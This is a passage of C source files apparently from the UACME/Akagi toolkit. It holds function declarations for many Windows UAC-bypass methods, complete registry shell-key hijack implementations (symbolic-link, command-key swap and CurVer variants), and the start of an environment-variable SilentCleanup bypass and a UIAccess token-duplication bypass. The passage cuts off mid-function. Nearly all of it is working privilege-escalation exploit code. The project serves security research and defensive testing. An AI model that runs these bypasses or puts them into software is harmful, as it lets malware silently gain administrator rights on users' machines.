lpszTargetApp,\n    LPCWSTR lpszPayload);\n\nNTSTATUS ucmShellRegModMethod2(\n    _In_ UCM_METHOD Method,\n    LPCWSTR lpTargetKey,\n    LPCWSTR lpszTargetApp,\n    LPCWSTR lpszPayload);\n\nNTSTATUS ucmShellRegModMethod3(\n    LPCWSTR lpTargetKey,\n    LPCWSTR lpszTargetApp,\n    LPCWSTR lpszPayload);\n\nNTSTATUS ucmCMLuaUtilShellExecMethod(\n    _In_ LPWSTR lpszExecutable);\n\nNTSTATUS ucmNICPoisonMethod(\n    _In_ PVOID ProxyDll,\n    _In_ DWORD ProxyDllSize);\n\nNTSTATUS ucmNICPoisonMethod2(\n    _In_ PVOID ProxyDll,\n    _In_ DWORD ProxyDllSize);\n\nNTSTATUS ucmIeAddOnInstallMethod(\n    _In_ PVOID ProxyDll,\n    _In_ DWORD ProxyDllSize);\n\nNTSTATUS ucmWscActionProtocolMethod(\n    _In_ LPCWSTR lpszPayload);\n\nNTSTATUS ucmFwCplLuaMethod2(\n    _In_ LPCWSTR lpszPayload);\n\nNTSTATUS ucmMsSettingsProtocolMethod(\n    _In_ LPCWSTR lpszPayload);\n\nNTSTATUS 
ucmMsStoreProtocolMethod(\n    _In_ LPCWSTR lpszPayload);\n\nNTSTATUS ucmPcaMethod(\n    _In_ PVOID ProxyDll,\n    _In_ DWORD ProxyDllSize);\n\nNTSTATUS ucmDirectoryMockMethod(\n    _In_ PVOID ProxyDll,\n    _In_ DWORD ProxyDllSize);\n\nNTSTATUS ucmHakrilMethod(\n    _In_ PVOID ProxyDll,\n    _In_ DWORD ProxyDllSize);\n\nNTSTATUS ucmSXSMethod(\n    _In_ PVOID ProxyDll,\n    _In_ DWORD ProxyDllSize,\n    _In_opt_ LPWSTR lpTargetDirectory,\n    _In_ LPWSTR lpTargetApplication,\n    _In_opt_ LPWSTR lpLaunchApplication,\n    _In_ BOOL bConsentItself);\n\nNTSTATUS ucmDismMethod(\n    _In_ PVOID ProxyDll,\n    _In_ DWORD ProxyDllSize);\n\nNTSTATUS ucmWow64LoggerMethod(\n    _In_ PVOID ProxyDll,\n    _In_ DWORD ProxyDllSize);\n\nNTSTATUS ucmUiAccessMethod(\n    _In_ PVOID ProxyDll,\n    _In_ DWORD ProxyDllSize);\n\nNTSTATUS ucmSXSDccwMethod(\n    _In_ PVOID ProxyDll,\n    _In_ DWORD ProxyDllSize);\n\nNTSTATUS ucmCorProfilerMethod(\n    _In_ PVOID ProxyDll,\n    _In_ DWORD ProxyDllSize);\n\nNTSTATUS ucmDccwCOMMethod(\n    _In_ LPWSTR lpszPayload);\n\nNTSTATUS ucmJunctionMethod(\n    _In_ PVOID ProxyDll,\n    _In_ DWORD ProxyDllSize);\n\nNTSTATUS ucmMsdtMethod(\n    _In_ PVOID ProxyDll,\n    _In_ DWORD ProxyDllSize);\n\nNTSTATUS ucmIscsiCplMethod(\n    _In_ PVOID ProxyDll,\n    _In_ DWORD ProxyDllSize);\n\nNTSTATUS ucmDotNetSerialMethod(\n    _In_ LPWSTR lpszPayload);\n\nNTSTATUS ucmEditionUpgradeManagerMethod(\n    _In_ PVOID ProxyDll,\n    _In_ DWORD ProxyDllSize);\n\nNTSTATUS ucmDiskCleanupEnvironmentVariable(\n    _In_ LPWSTR lpszPayload);\n\nNTSTATUS ucmTokenModUIAccessMethod(\n    _In_ PVOID ProxyDll,\n    _In_ DWORD ProxyDllSize);\n\nNTSTATUS ucmTokenModUIAccessMethod2(\n    _In_ PVOID ProxyDll,\n    _In_ DWORD ProxyDllSize);\n\nNTSTATUS ucmDebugObjectMethod(\n    _In_ LPWSTR lpszPayload);\n\nNTSTATUS ucmVFServerTaskSchedMethod(\n    _In_ PVOID ProxyDll,\n    _In_ DWORD ProxyDllSize);\n\nNTSTATUS ucmVFServerDiagProfileMethod(\n    _In_ PVOID ProxyDll,\n    _In_ DWORD 
ProxyDllSize);\n\nBOOL ucmCreateCabinetForSingleFile(\n    _In_ LPWSTR lpSourceDll,\n    _In_ PVOID ProxyDll,\n    _In_ DWORD ProxyDllSize,\n    _In_opt_ LPWSTR lpInternalName);\n\nBOOL ucmWusaExtractViaJunction(\n    _In_ LPWSTR lpTargetDirectory);\n\nNTSTATUS ucmAtlHijackMethod(\n    _In_opt_ LPCWSTR lpTargetApp,\n    _In_ LPCWSTR lpTargetDll,\n    _In_ PVOID ProxyDll,\n    _In_ DWORD ProxyDllSize);\n\nNTSTATUS ucmSspiDatagramMethod(\n    _In_ PVOID ProxyDll,\n    _In_ DWORD ProxyDllSize);\n\nNTSTATUS ucmRequestTraceMethod(\n    _In_ PVOID ProxyDll,\n    _In_ DWORD ProxyDllSize);\n\nNTSTATUS ucmQuickAssistMethod(\n    _In_ PVOID ProxyDll,\n    _In_ DWORD ProxyDllSize);\n\n//\n// Post execution cleanup routines.\n//\nBOOL ucmMethodCleanupSingleItemSystem32(\n    _In_ LPCWSTR lpItemName,\n    _In_opt_ LPCWSTR lpSubDirectory);\n\nBOOL ucmJunctionMethodCleanup(\n    VOID);\n\nBOOL ucmSXSDccwMethodCleanup(\n    VOID);\n\nBOOL ucmSXSMethodCleanup(\n    VOID);\n\nVOID ucmDismMethodCleanup(\n    VOID);\n\nBOOL ucmHakrilMethodCleanup(\n    VOID);\n\nVOID ucmWusaCabinetCleanup(\n    VOID);\n\nVOID ucmIscsiCplMethodCleanup(\n    VOID);\n"
  },
  {
    "path": "Source/Akagi/methods/shellsup.c",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2016 - 2023\n*\n*  TITLE:       SHELLSUP.C\n*\n*  VERSION:     3.69\n*\n*  DATE:        07 Jul 2025\n*\n*  Shell registry hijack autoelevation methods.\n*\n*  Used by various malware.\n*\n*  For description please visit original URL\n*  https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/\n*  https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/\n*  https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/\n*  https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/\n*  https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/\n*  http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass\n*  https://www.activecyber.us/1/post/2019/03/windows-uac-bypass.html\n*  https://packetstormsecurity.com/files/155927/Microsoft-Windows-10-Local-Privilege-Escalation.html\n*  https://v3ded.github.io/redteam/utilizing-programmatic-identifiers-progids-for-uac-bypasses\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#include \"global.h\"\n\n/*\n* ucmxSetSlaveParams\n*\n* Purpose:\n*\n* Set slave key parameters.\n*\n*/\nNTSTATUS ucmxSetSlaveParams(\n    _In_ HANDLE KeyHandle,\n    _In_ LPCWSTR Payload\n)\n{\n    NTSTATUS ntStatus = STATUS_ACCESS_DENIED;\n    SIZE_T sz;\n    DWORD cbData, dummy;\n\n    dummy = 0;\n    cbData = 0;\n\n    ntStatus = supRegWriteValue(KeyHandle,\n        T_DELEGATEEXECUTE,\n        REG_SZ,\n        &dummy,\n        cbData);\n\n    if (NT_SUCCESS(ntStatus)) {\n\n        //\n        // Set \"Default\" value as our payload.\n        //\n        sz = (1 + 
_strlen(Payload)) * sizeof(WCHAR);\n\n        ntStatus = supRegWriteValue(KeyHandle,\n            NULL,\n            REG_SZ,\n            (PVOID)Payload,\n            (ULONG)sz);\n\n    }\n\n    return ntStatus;\n}\n\n/*\n* ucmxCreateSlaveKey\n*\n* Purpose:\n*\n* Create temporary key with all required values.\n*\n*/\nNTSTATUS ucmxCreateSlaveKey(\n    _In_ HANDLE RootKey,\n    _In_ LPCWSTR Payload,\n    _Inout_ LPWSTR SlaveKey //cch max MAX_PATH\n)\n{\n    NTSTATUS ntStatus = STATUS_ACCESS_DENIED;\n    GUID guidTemp;\n    LPWSTR lpGuidKey = NULL;\n\n    HKEY hKey;\n    SIZE_T sz;\n\n    do {\n\n        if (CoCreateGuid(&guidTemp) != S_OK)\n            break;\n\n        if (StringFromCLSID(&guidTemp, &lpGuidKey) != S_OK)\n            break;\n\n        sz = (1 + _strlen(lpGuidKey)) * sizeof(WCHAR);\n\n        _strncpy(SlaveKey, MAX_PATH, lpGuidKey, MAX_PATH);\n\n        //\n        // Slave key with data.\n        //\n        if (ERROR_SUCCESS == RegCreateKey(RootKey,\n            lpGuidKey,\n            &hKey))\n        {\n            ntStatus = ucmxSetSlaveParams(hKey, Payload);\n            RegCloseKey(hKey);\n        }\n\n    } while (FALSE);\n\n    CoTaskMemFree(lpGuidKey);\n\n    return ntStatus;\n}\n\n/*\n* ucmShellRegModMethod\n*\n* Purpose:\n*\n* Bypass UAC using various registry shell key modifications.\n*\n*/\nNTSTATUS ucmShellRegModMethod(\n    _In_ UCM_METHOD Method,\n    LPCWSTR lpTargetKey,\n    LPCWSTR lpszTargetApp,\n    LPCWSTR lpszPayload\n)\n{\n    NTSTATUS MethodResult = STATUS_ACCESS_DENIED;\n    BOOLEAN bSlaveCreated = FALSE;\n    NTSTATUS ntStatus = STATUS_ACCESS_DENIED;\n\n    HANDLE masterRootKey = NULL, classesKey = NULL, targetKey = NULL;\n    OBJECT_ATTRIBUTES obja;\n    UNICODE_STRING    usCurrentUser, usMasterKey, usSlaveKey;\n\n    WCHAR szSlaveKey[MAX_PATH * 2];\n    WCHAR szMasterKey[MAX_PATH * 2];\n    WCHAR szClasses[MAX_PATH];\n    WCHAR szBuffer[MAX_PATH * 2];\n\n    SHELLEXECUTEINFO shinfo;\n\n    LPWSTR lpSlaveNtKey = NULL;\n\n  
  DWORD dummy;\n    SIZE_T sz;\n    UNICODE_STRING CmSymbolicLinkValue = RTL_CONSTANT_STRING(L\"SymbolicLinkValue\");\n    HRESULT hr_init;\n\n\n    hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);\n\n    RtlSecureZeroMemory(&szSlaveKey, sizeof(szSlaveKey));\n\n#ifndef _WIN64\n    if (g_ctx->IsWow64) {\n        ntStatus = supEnableDisableWow64Redirection(TRUE);\n        if (!NT_SUCCESS(ntStatus))\n            return ntStatus;\n    }\n#endif\n\n    do {\n\n        //\n        // Remember current user reg name.\n        //\n        ntStatus = RtlFormatCurrentUserKeyPath(&usCurrentUser);\n        if (!NT_SUCCESS(ntStatus))\n            break;\n\n        //\n        // Open classes root.\n        //\n        ntStatus = supOpenClassesKey(&usCurrentUser, &classesKey);\n        if (!NT_SUCCESS(ntStatus))\n            break;\n\n        //\n        // Create slave key.\n        //\n        szSlaveKey[0] = L'\\\\';\n        szSlaveKey[1] = 0;\n\n        ntStatus = ucmxCreateSlaveKey(\n            classesKey,\n            lpszPayload,\n            &szSlaveKey[1]);\n\n        if (!NT_SUCCESS(ntStatus))\n            break;\n\n        bSlaveCreated = TRUE;\n\n        //\n        // Allocate slave NT regpath.\n        //\n        sz = (MAX_PATH + _strlen(szSlaveKey) * sizeof(WCHAR)) +\n            usCurrentUser.MaximumLength;\n\n        lpSlaveNtKey = (PWSTR)supHeapAlloc(sz);\n        if (lpSlaveNtKey == NULL)\n            break;\n\n        RtlInitEmptyUnicodeString(&usSlaveKey, lpSlaveNtKey, sz);\n\n        ntStatus = RtlAppendUnicodeStringToString(&usSlaveKey, &usCurrentUser);\n        if (!NT_SUCCESS(ntStatus))\n            break;\n\n        szClasses[0] = L'\\\\';\n        szClasses[1] = 0;\n        _strcpy(&szClasses[1], T_SOFTWARE_CLASSES);\n        ntStatus = RtlAppendUnicodeToString(&usSlaveKey, szClasses);\n        if (!NT_SUCCESS(ntStatus))\n            break;\n\n        ntStatus = RtlAppendUnicodeToString(&usSlaveKey, szSlaveKey);\n        if 
(!NT_SUCCESS(ntStatus))\n            break;\n\n        //\n        // Create empty master key.\n        //\n        _strncpy(szMasterKey, MAX_PATH, lpTargetKey, MAX_PATH);\n        _strcat(szMasterKey, T_SHELL_OPEN);\n\n        if (ERROR_SUCCESS != RegCreateKeyEx(classesKey,\n            szMasterKey,\n            0,\n            NULL,\n            REG_OPTION_NON_VOLATILE,\n            MAXIMUM_ALLOWED,\n            NULL,\n            (HKEY*)&masterRootKey,\n            NULL))\n        {\n            break;\n        }\n\n        //\n        // Open/create master key.\n        //\n        RtlInitUnicodeString(&usMasterKey, T_SHELL_COMMAND);\n        InitializeObjectAttributes(&obja, &usMasterKey, OBJ_CASE_INSENSITIVE, masterRootKey, NULL);\n\n        ntStatus = NtCreateKey(&targetKey,\n            KEY_ALL_ACCESS,\n            &obja, 0, NULL,\n            REG_OPTION_CREATE_LINK | REG_OPTION_VOLATILE,\n            &dummy);\n\n        //\n        // If link already created, update it.\n        //\n        if (ntStatus == STATUS_OBJECT_NAME_COLLISION) {\n\n            obja.Attributes |= OBJ_OPENLINK;\n\n            ntStatus = NtOpenKey(&targetKey,\n                KEY_ALL_ACCESS,\n                &obja);\n\n        }\n\n        if (!NT_SUCCESS(ntStatus))\n            break;\n\n        sz = _strlen(usSlaveKey.Buffer) * sizeof(WCHAR);\n\n        ntStatus = NtSetValueKey(targetKey,\n            &CmSymbolicLinkValue,\n            0,\n            REG_LINK,\n            (PVOID)usSlaveKey.Buffer,\n            (ULONG)usSlaveKey.Length);\n\n        if (!NT_SUCCESS(ntStatus))\n            break;\n\n        NtClose(targetKey);\n        targetKey = NULL;\n\n        if ((Method == UacMethodShellChangePk) || (Method == UacMethodShellSdclt)) {\n\n            _strcpy(szBuffer, g_ctx->szSystemDirectory);\n            _strcat(szBuffer, lpszTargetApp);\n            RtlSecureZeroMemory(&shinfo, sizeof(shinfo));\n            shinfo.cbSize = sizeof(shinfo);\n            shinfo.lpVerb = 
RUNAS_VERB;\n            shinfo.lpFile = szBuffer;\n            shinfo.nShow = SW_SHOWNORMAL;\n            shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;\n            if (ShellExecuteEx(&shinfo)) {\n                Sleep(5000);\n                TerminateProcess(shinfo.hProcess, 0);\n                CloseHandle(shinfo.hProcess);\n                MethodResult = STATUS_SUCCESS;\n            }\n\n        }\n        else {\n            if (supRunProcess(lpszTargetApp, NULL))\n                MethodResult = STATUS_SUCCESS;\n        }\n\n    } while (FALSE);\n\n    if (targetKey) NtClose(targetKey);\n    if (masterRootKey) NtClose(masterRootKey);\n    if (lpSlaveNtKey) supHeapFree(lpSlaveNtKey);\n\n    //\n    // Cleanup slave key.\n    //\n    if (bSlaveCreated) {\n        if (classesKey) {\n            RegDeleteKey(classesKey, &szSlaveKey[1]);//skip slash\n        }\n    }\n\n    if (classesKey)\n        NtClose(classesKey);\n\n    if (SUCCEEDED(hr_init)) CoUninitialize();\n\n    //\n    // Remove symlink.\n    //\n    szMasterKey[0] = L'\\\\';\n    szMasterKey[1] = 0;\n    _strcpy(&szMasterKey[1], T_SOFTWARE_CLASSES);\n    _strcat(szMasterKey, TEXT(\"\\\\\"));\n    _strcat(szMasterKey, lpTargetKey);\n    _strcat(szMasterKey, T_SHELL_OPEN);\n    _strcat(szMasterKey, TEXT(\"\\\\\"));\n    _strcat(szMasterKey, T_SHELL_COMMAND);\n    supRemoveRegLinkHKCU(szMasterKey);\n\n#ifndef _WIN64\n    if (g_ctx->IsWow64) {\n        supEnableDisableWow64Redirection(FALSE);\n    }\n#endif\n    return MethodResult;\n}\n\n/*\n* ucmShellRegModMethod2\n*\n* Purpose:\n*\n* Bypass UAC using various registry shell key modifications.\n*\n*/\nNTSTATUS ucmShellRegModMethod2(\n    _In_ UCM_METHOD Method,\n    LPCWSTR lpTargetKey,\n    LPCWSTR lpszTargetApp,\n    LPCWSTR lpszPayload\n)\n{\n    BOOLEAN bBackupAvailable = FALSE;\n    NTSTATUS MethodResult = STATUS_ACCESS_DENIED, ntStatus;\n    HANDLE hClassesRoot = NULL, hSubKey = NULL;\n    DWORD dwDisp = 0;\n    WCHAR szKey[MAX_PATH];\n    PWSTR pwszKey;\n\n    
UNREFERENCED_PARAMETER(Method);\n\n#ifndef _WIN64\n    if (g_ctx->IsWow64) {\n        ntStatus = supEnableDisableWow64Redirection(TRUE);\n        if (!NT_SUCCESS(ntStatus))\n            return ntStatus;\n    }\n#endif\n\n    do {\n\n        ntStatus = supOpenClassesKey(NULL, &hClassesRoot);\n        if (!NT_SUCCESS(ntStatus))\n            break;\n\n        RtlSecureZeroMemory(&szKey, sizeof(szKey));\n\n        _strcpy(szKey, lpTargetKey);\n        _strcat(szKey, T_SHELL_OPEN);\n        _strcat(szKey, TEXT(\"\\\\\"));\n        _strcat(szKey, T_SHELL_COMMAND);\n\n        //\n        // If \"command\" key exist - backup it.\n        //\n        if (ERROR_SUCCESS == RegOpenKeyEx(hClassesRoot,\n            szKey,\n            0,\n            MAXIMUM_ALLOWED,\n            (HKEY*)&hSubKey))\n        {\n            RegCloseKey(hSubKey);\n            bBackupAvailable = (RegRenameKey(hClassesRoot,\n                szKey,\n                MYSTERIOUSCUTETHING) == ERROR_SUCCESS);\n        }\n\n        _strcat(szKey, TEXT(\"~\"));\n\n        hSubKey = NULL;\n\n        if (ERROR_SUCCESS != RegCreateKeyEx(hClassesRoot,\n            szKey,\n            0,\n            NULL,\n            REG_OPTION_NON_VOLATILE,\n            MAXIMUM_ALLOWED,\n            NULL,\n            (HKEY*)&hSubKey,\n            &dwDisp))\n        {\n            break;\n        }\n\n        ntStatus = ucmxSetSlaveParams(hSubKey, lpszPayload);\n        if (!NT_SUCCESS(ntStatus))\n            break;\n\n        RegCloseKey(hSubKey);\n        hSubKey = NULL;\n\n        RegRenameKey(hClassesRoot, szKey, T_SHELL_COMMAND);\n\n        if (supRunProcess(lpszTargetApp, NULL))\n            MethodResult = STATUS_SUCCESS;\n\n    } while (FALSE);\n\n    if (hSubKey) RegCloseKey(hSubKey);\n\n    //\n    // Cleanup section.\n    //\n\n    _strcpy(szKey, lpTargetKey);\n    _strcat(szKey, T_SHELL_OPEN);\n    _strcat(szKey, TEXT(\"\\\\\"));\n\n    if (bBackupAvailable) {\n\n        pwszKey = _strend(szKey);\n\n        
_strcat(szKey, T_SHELL_COMMAND);\n        RegDeleteKey(hClassesRoot, szKey);\n        *pwszKey = 0;\n\n        _strcat(szKey, MYSTERIOUSCUTETHING);\n\n        RegRenameKey(hClassesRoot,\n            szKey,\n            T_SHELL_COMMAND);\n    }\n    else {\n        _strcat(szKey, T_SHELL_COMMAND);\n        RegDeleteKey(hClassesRoot, szKey);\n    }\n\n    if (hClassesRoot) NtClose(hClassesRoot);\n\n\n#ifndef _WIN64\n    if (g_ctx->IsWow64) {\n        supEnableDisableWow64Redirection(FALSE);\n    }\n#endif\n    return MethodResult;\n}\n\n/*\n* ucmShellRegModMethod3\n*\n* Purpose:\n*\n* Bypass UAC using registry shell key CurVer progId.\n*\n*/\nNTSTATUS ucmShellRegModMethod3(\n    LPCWSTR lpTargetKey,\n    LPCWSTR lpszTargetApp,\n    LPCWSTR lpszPayload\n)\n{\n    NTSTATUS MethodResult = STATUS_ACCESS_DENIED;\n    HANDLE hClassesRoot, hSubKey = NULL;\n\n    SIZE_T sz;\n    WCHAR szKey[MAX_PATH];\n\n#ifndef _WIN64\n    if (g_ctx->IsWow64) {\n        MethodResult = supEnableDisableWow64Redirection(TRUE);\n        if (!NT_SUCCESS(MethodResult))\n            return MethodResult;\n    }\n#endif\n\n    do {\n\n        MethodResult = supOpenClassesKey(NULL, &hClassesRoot);\n        if (!NT_SUCCESS(MethodResult))\n            break;\n\n        RtlSecureZeroMemory(&szKey, sizeof(szKey));\n\n        //\n        // Prepare registry key for a new handler.\n        //\n        _strcpy(szKey, ABSOLUTEWIN);\n        _strcat(szKey, T_SHELL_OPEN);\n        _strcat(szKey, TEXT(\"\\\\\"));\n        _strcat(szKey, T_SHELL_COMMAND);\n\n        if (ERROR_SUCCESS == RegCreateKeyEx(hClassesRoot, szKey, 0, NULL,\n            REG_OPTION_NON_VOLATILE,\n            MAXIMUM_ALLOWED,\n            NULL,\n            (HKEY*)&hSubKey,\n            NULL))\n        {\n            sz = (1 + _strlen(lpszPayload)) * sizeof(WCHAR);\n\n            MethodResult = supRegWriteValue(hSubKey,\n                NULL,\n                REG_SZ,\n                (PVOID)lpszPayload,\n                (DWORD)sz);\n\n\n    
        RegCloseKey(hSubKey);\n        }\n\n        if (!NT_SUCCESS(MethodResult))\n            break;\n\n        //\n        // Set CurVer to target key\n        //\n        hSubKey = NULL;\n        _strcpy(szKey, lpTargetKey);\n        _strcat(szKey, TEXT(\"\\\\\"));\n        _strcat(szKey, T_CURVER);\n\n        if (ERROR_SUCCESS == RegCreateKeyEx(hClassesRoot, szKey, 0, NULL,\n            REG_OPTION_NON_VOLATILE,\n            MAXIMUM_ALLOWED,\n            NULL,\n            (HKEY*)&hSubKey,\n            NULL))\n        {\n            sz = (1 + _strlen(ABSOLUTEWIN)) * sizeof(WCHAR);\n\n            MethodResult = supRegWriteValue(hSubKey,\n                NULL,\n                REG_SZ,\n                (PVOID)ABSOLUTEWIN,\n                (DWORD)sz);\n\n            if (NT_SUCCESS(MethodResult)) {\n\n                if (supRunProcess(lpszTargetApp, NULL))\n                    MethodResult = STATUS_SUCCESS;\n\n            }\n\n            RegCloseKey(hSubKey);\n\n            RegDeleteKey(hClassesRoot, szKey);\n        }\n\n    } while (FALSE);\n\n    supRegDeleteKeyRecursive(hClassesRoot, ABSOLUTEWIN);\n\n    if (hClassesRoot) NtClose(hClassesRoot);\n\n\n\n#ifndef _WIN64\n    if (g_ctx->IsWow64) {\n        supEnableDisableWow64Redirection(FALSE);\n    }\n#endif\n    return MethodResult;\n}\n"
  },
  {
    "path": "Source/Akagi/methods/tyranid.c",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2017 - 2025\n*\n*  TITLE:       TYRANID.C\n*\n*  VERSION:     3.69\n*\n*  DATE:        07 Jul 2025\n*\n*  James Forshaw autoelevation method(s)\n*  Fine Dinning Tool (c) CIA\n*\n*  For description please visit original URL\n*  https://tyranidslair.blogspot.ru/2017/05/exploiting-environment-variables-in.html\n*  https://tyranidslair.blogspot.ru/2017/05/reading-your-way-around-uac-part-1.html\n*  https://tyranidslair.blogspot.ru/2017/05/reading-your-way-around-uac-part-2.html\n*  https://tyranidslair.blogspot.ru/2017/05/reading-your-way-around-uac-part-3.html\n*  https://tyranidslair.blogspot.com/2019/02/accessing-access-tokens-for-uiaccess.html\n*  https://googleprojectzero.blogspot.com/2019/12/calling-local-windows-rpc-servers-from.html\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#include \"global.h\"\n\n/*\n* ucmDiskCleanupEnvironmentVariable\n*\n* Purpose:\n*\n* DiskCleanup task uses current user environment variables to build a path to the executable.\n* Warning: this method works with AlwaysNotify UAC level.\n*\n*/\nNTSTATUS ucmDiskCleanupEnvironmentVariable(\n    _In_ LPWSTR lpszPayload\n)\n{\n    NTSTATUS MethodResult = STATUS_ACCESS_DENIED;\n\n    WCHAR   szEnvVariable[MAX_PATH * 2];\n    PWCHAR  psz;\n    BOOL    quoteFix;\n\n    do {\n\n        if (_strlen(lpszPayload) > MAX_PATH)\n            return STATUS_INVALID_PARAMETER;\n\n        RtlSecureZeroMemory(szEnvVariable, sizeof(szEnvVariable));\n        quoteFix = (g_ctx->dwBuildNumber >= NT_WIN10_21H2);\n\n        //\n        // Add quotes.\n        //\n        szEnvVariable[0] = L'\\\"';\n        psz = 
&szEnvVariable[!!quoteFix];\n\n        _strncpy(&szEnvVariable[1], MAX_PATH, lpszPayload, MAX_PATH);\n        _strcat(szEnvVariable, L\"\\\"\");\n\n        //\n        // Set our controlled env.variable with payload.\n        //\n        if (!supSetEnvVariableEx(FALSE, NULL, T_WINDIR, psz))\n            break;\n\n        //\n        // Run trigger task.\n        //\n        if (supStartScheduledTask(L\"\\\\Microsoft\\\\Windows\\\\DiskCleanup\", L\"SilentCleanup\"))\n            MethodResult = STATUS_SUCCESS;\n\n        //\n        // Cleanup our env.variable.\n        //\n        supSetEnvVariableEx(TRUE, NULL, T_WINDIR, NULL);\n\n    } while (FALSE);\n\n    return MethodResult;\n}\n\n/*\n* ucmxTokenModUIAccessMethodInitPhase\n*\n* Purpose:\n*\n* Convert dll to new entrypoint/exe.\n*\n*/\nBOOL ucmxTokenModUIAccessMethodInitPhase(\n    _In_ PVOID ProxyDll,\n    _In_ DWORD ProxyDllSize,\n    _In_ LPCSTR EntryPointName,\n    _In_ LPCWSTR PayloadFileName\n)\n{\n    BOOL bResult = FALSE;\n\n    WCHAR szBuffer[MAX_PATH * 2];\n\n    //\n    // Patch Fubuki to the new entry point and convert to EXE\n    //\n    if (supReplaceDllEntryPoint(ProxyDll,\n        ProxyDllSize,\n        EntryPointName,\n        TRUE))\n    {\n        //\n        // Drop modified Fubuki to the %temp%\n        //\n        RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));\n        _strcpy(szBuffer, g_ctx->szTempDirectory);\n        _strcat(szBuffer, PayloadFileName);\n        bResult = supWriteBufferToFile(szBuffer, ProxyDll, ProxyDllSize);\n    }\n\n    return bResult;\n}\n\n/*\n* ucmxTokenModUIAccessExec\n*\n* Purpose:\n*\n* Obtain token from UIAccess application, modify it and reuse for UAC bypass.\n*\n*/\nNTSTATUS ucmxTokenModUIAccessExec(\n    _In_ PVOID ProxyDll,\n    _In_ DWORD ProxyDllSize,\n    _In_ LPCSTR EntryPointName,\n    _In_ LPCWSTR PayloadFileName,\n    _In_ UCM_METHOD Method\n)\n{\n    NTSTATUS Status = STATUS_ACCESS_DENIED;\n    LPWSTR lpszPayload = NULL;\n    PSID pIntegritySid = 
NULL;\n    HANDLE hDupToken = NULL, hProcessToken = NULL;\n    SHELLEXECUTEINFO shinfo;\n    SID_IDENTIFIER_AUTHORITY MLAuthority = SECURITY_MANDATORY_LABEL_AUTHORITY;\n    TOKEN_MANDATORY_LABEL tml;\n    SECURITY_QUALITY_OF_SERVICE sqos;\n    OBJECT_ATTRIBUTES obja;\n    WCHAR szBuffer[MAX_PATH * 2];\n\n    STARTUPINFO si;\n    PROCESS_INFORMATION pi;\n\n    RtlSecureZeroMemory(&shinfo, sizeof(shinfo));\n\n    do {\n        //\n        // Tweak and drop payload to %temp%.\n        //\n        if (!ucmxTokenModUIAccessMethodInitPhase(ProxyDll,\n            ProxyDllSize,\n            EntryPointName,\n            PayloadFileName))\n        {\n            break;\n        }\n\n        //\n        // Spawn OSK.exe process.\n        //\n        _strcpy(szBuffer, g_ctx->szSystemDirectory);\n        _strcat(szBuffer, OSK_EXE);\n\n        shinfo.cbSize = sizeof(shinfo);\n        shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;\n        shinfo.lpFile = szBuffer;\n        shinfo.nShow = SW_HIDE;\n        if (!ShellExecuteEx(&shinfo))\n            break;\n\n        //\n        // Open process token.\n        //\n        Status = NtOpenProcessToken(shinfo.hProcess, TOKEN_DUPLICATE | TOKEN_QUERY, &hProcessToken);\n        if (!NT_SUCCESS(Status))\n            break;\n\n        //\n        // Duplicate primary token.\n        //\n        sqos.Length = sizeof(SECURITY_QUALITY_OF_SERVICE);\n        sqos.ImpersonationLevel = SecurityImpersonation;\n        sqos.ContextTrackingMode = 0;\n        sqos.EffectiveOnly = FALSE;\n        InitializeObjectAttributes(&obja, NULL, 0, NULL, NULL);\n        obja.SecurityQualityOfService = &sqos;\n        Status = NtDuplicateToken(hProcessToken, TOKEN_ALL_ACCESS, &obja, FALSE, TokenPrimary, &hDupToken);\n        if (!NT_SUCCESS(Status))\n            break;\n\n        NtClose(hProcessToken);\n        hProcessToken = NULL;\n\n        NtTerminateProcess(shinfo.hProcess, STATUS_SUCCESS);\n        NtClose(shinfo.hProcess);\n        shinfo.hProcess = NULL;\n\n  
      //\n        // Lower duplicated token IL from Medium+ to Medium.\n        //\n        Status = RtlAllocateAndInitializeSid(&MLAuthority,\n            1, SECURITY_MANDATORY_MEDIUM_RID,\n            0, 0, 0, 0, 0, 0, 0,\n            &pIntegritySid);\n        if (!NT_SUCCESS(Status))\n            break;\n\n        tml.Label.Attributes = SE_GROUP_INTEGRITY;\n        tml.Label.Sid = pIntegritySid;\n\n        Status = NtSetInformationToken(hDupToken, TokenIntegrityLevel, &tml,\n            (ULONG)(sizeof(TOKEN_MANDATORY_LABEL) + RtlLengthSid(pIntegritySid)));\n        if (!NT_SUCCESS(Status))\n            break;\n\n        RtlSecureZeroMemory(&pi, sizeof(PROCESS_INFORMATION));\n        RtlSecureZeroMemory(&si, sizeof(STARTUPINFO));\n        si.cb = sizeof(STARTUPINFO);\n        GetStartupInfo(&si);\n\n        // \n        // Run second stage exe to perform some gui hacks.\n        //\n        _strcpy(szBuffer, g_ctx->szTempDirectory);\n        _strcat(szBuffer, PKGMGR_EXE);\n\n        if (Method == UacMethodTokenModUiAccess) {\n            if (g_ctx->OptionalParameterLength == 0)\n                lpszPayload = g_ctx->szDefaultPayload;\n            else\n                lpszPayload = g_ctx->szOptionalParameter;\n        }\n\n        if (CreateProcessAsUser(hDupToken,\n            szBuffer,    //application\n            lpszPayload, //command line\n            NULL,\n            NULL,\n            FALSE,\n            CREATE_DEFAULT_ERROR_MODE | 